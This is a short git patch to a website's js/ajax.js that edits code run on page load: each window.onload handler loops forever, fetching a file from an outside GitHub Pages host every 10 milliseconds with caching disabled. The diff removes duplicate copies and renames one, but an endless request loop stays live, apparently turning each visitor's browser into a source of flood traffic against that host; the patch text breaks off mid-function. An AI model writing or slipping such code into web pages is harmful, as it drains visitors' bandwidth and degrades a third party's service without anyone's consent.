From 6f19503b92fb4fd4e96ce8d5f1683fe946c93382 Mon Sep 17 00:00:00 2001 From: Boof <97455552+hexahigh@users.noreply.github.com> Date: Wed, 18 Jan 2023 13:18:31 +0100 Subject: [PATCH] e --- js/ajax.js | 15 +-------------- 1 file changed, 1 insertion(+), 14 deletions(-) diff --git a/js/ajax.js b/js/ajax.js index 6afb199..4c3c23f 100644 --- a/js/ajax.js +++ b/js/ajax.js @@ -35,26 +35,13 @@ if(resppage = true){ } } -//Multithreaded download window.onload = async function startdown(){ while(true) { await delay(10); await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"}) } } -window.onload = async function startdown(){ - while(true) { - await delay(10); - await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"}) - } -} -window.onload = async function startdown(){ - while(true) { - await delay(10); - await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"}) - } -} -window.onload = async function startdown(){ +window.onload = async function startdown2(){ while(true) { await delay(10); await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})